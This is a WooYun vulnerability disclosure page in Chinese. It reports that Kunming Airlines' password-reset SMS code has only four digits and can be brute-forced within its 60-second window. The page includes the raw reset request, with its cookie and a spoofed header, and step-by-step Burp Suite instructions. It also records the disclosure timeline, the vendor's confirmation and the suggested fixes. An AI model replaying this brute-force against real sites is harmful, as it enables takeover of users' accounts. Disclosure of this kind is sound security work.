当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145172

漏洞标题:昆明航空设计缺陷修复不完善导致任意重置帐号密码(13888888888土豪为例)

相关厂商:昆明航空

漏洞作者: 路人甲

提交时间:2015-10-07 14:45

修复时间:2015-11-22 10:32

公开时间:2015-11-22 10:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

昆明航空官网找回密码可以任意重置用户密码,
之前牛小帅同学 WooYun: 昆明航空设计缺陷导致任意重置帐号密码(13888888888土豪为例) 已经成功重置,但是昆明航空的找回密码还是存在设计缺陷
再次拿13888888888土豪号演示
1.输入要找回的账户手机

1.png


2.发送验证码

2.png


3.由于验证码有效时间仅有60秒,需要提前就抓好包,放入burpsuite等待爆破

60秒.png


GET /user/resetPassUserVerify.html?vCode=1234 HTTP/1.1
Host: www.airkunming.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://www.airkunming.com/user/toForgetPass.html
Cookie: JSESSIONID=0000SBoibyNiFYW7txGXRW5w9_7:19k1i5cbh; CNZZDATA30066983=cnzz_eid%3D992248680-1444185840-%26ntime%3D1444185840;
looyu_id=701a233bd3f9a1af1eff5c2653e981be6f_46839%3A1; looyu_46839=v%3A701a233bd3f9a1af1eff5c2653e981be6f%2Cref%3A%2Cr%3A%2Cmon%3Ahttp%3A//m151.looyu.com/monitor
X-Forwarded-For: 8.8.8.8
Connection: keep-alive


爆破vCode参数,4位数
4.burpsuite线程开大点,大概10几秒就能完成4位数的爆破

成功.png


5.如上图所示已经爆破成功,密码变为初始的123456,进入用户

进入.png

漏洞证明:

已证明

修复方案:

1.置验证码尝试次数
2.加大验证码位数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-10-08 10:31

厂商回复:

感谢关注

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-03 15:03 | 牛 小 帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

    这漏洞都重复了 怎么还通过了。。